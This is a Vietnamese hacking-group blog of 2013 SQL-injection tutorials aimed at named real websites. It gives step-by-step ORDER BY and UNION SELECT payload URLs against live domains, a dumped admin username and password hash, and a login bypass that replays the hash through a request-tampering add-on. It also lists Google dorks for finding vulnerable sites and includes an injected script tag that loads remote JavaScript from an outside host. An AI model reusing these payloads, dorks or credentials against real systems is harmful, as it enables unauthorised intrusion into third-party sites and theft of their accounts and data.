Tut by: CallBoyBLF
Sau không biết bao nhiêu sóng gió, bao nhiêu thăng trầm, bao lần on rồi off. Tài nguyên của VHB bị mất đi khá nhiều. Từ nay blog này sẽ là nơi tổng hợp các tutorial hay của tất các các thành viên VHB_Group. Hi vọng đây sẽ là 1 không gian lưu trữ, chia sẻ, học tập không chỉ cho các thành viên VHB_Group mà còn cho tất cả các bạn có niềm đam mê Hacking & Security cũng như Coding. Mong các bạn sẽ ủng hộ nhiệt tình Blog tutorial của Group và có thêm những kiến thức bổ ích tại Blog này!
Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng
Thứ Ba, 2 tháng 4, 2013
Cách login khi không decode đc md5 đối với 1 số site
Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá
1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
Yêu cầu:
+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_deta...m%20tbl_user--
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
Video:
Video hướng dẫn
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá
1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
Yêu cầu:
+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_deta...m%20tbl_user--
1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
Video:
Video hướng dẫn
Tut by: Leorius
[ SQLI ] Magic convert
Victim: http://nchla.org/
Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.
Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz
Pass mediafire và winrar: vhb
Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.
Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz
Pass mediafire và winrar: vhb
[ SQLI ] SQLI site TQ
Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli
Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb
Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection
P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.
Tut by: S019ua
Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb
Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection
P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.
Tut by: S019ua
[ SQLI ] khai thác SQL với Javascript
Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay
file javascript
các bác tải về để sẵn khi nào dùng , lỡ em nó die
đoạn script
Video TUT
file javascript
các bác tải về để sẵn khi nào dùng , lỡ em nó die
đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Thứ Bảy, 30 tháng 3, 2013
SQLI - Bypass 406 Not Acceptable
Trong các bài trước , Soleil đã giới thiệu các dạng attack
cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với Aspx, Khai thác lỗi cơ bản, Lỗi Jet. Tuy
nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể
tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable”
thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với
công ty thiết kế website “Viet Arrow”.
Google dork: Designed by Viet Arrow id=
Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi
sqli, sau đây là 1 số ví dụ
Soleil sẽ chọn 1 victim bất kỳ để khai thác.
Victim: http://www.khaithong.com.vn/
Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi
Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi
sqli
SQLI - Khai Thác Đối Với ASPX
Victim:
http://quangcaovinasun.com.vn
Bước 1: Check link lỗi
Đối
với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=….
Nếu thấy site xuất hiện lỗi:
Unclosed quotation mark after the character string ''
Chứng
tỏ site dính lỗi SQLI.
Ví
dụ: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ SQLI - Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi:
Thêm dấu ‘ sau đường link có dạng id=
Nếu giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 1-- - -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 15-- - -> Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 16-- - -> Giao diện website
thay đổi.
Số trường cột cần tìm là 15
Bước 3: Xác định vị trí trường cột
bị lỗi
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421
thì mới xuất hiện ra các con số đẹp.
Chúng ta chú ý sẽ thấy xuất hiện
các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai
thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.
Bước 4: Xuất ra tên các tables trong database
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT
1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables where table_schema=database()-- -
SQLI - Lỗi Jet
Trong bài đâu tiên vê chủ để SQLI, Soleil giới thiệu với các bạn lỗi Jet khá phổ biến
Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column
Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:
Victim hôm nay soleil sẽ demo là:
http://thanhancamera.com/news.asp?tin_ID=86
Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’
Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column
Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:
tintuc.asp?tin_ID=
chitiet.asp?ID=
Victim hôm nay soleil sẽ demo là:
http://thanhancamera.com/news.asp?tin_ID=86
Bước 1: Check lỗi
Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.
/news.asp, line 16
Đăng ký:
Bài đăng (Atom)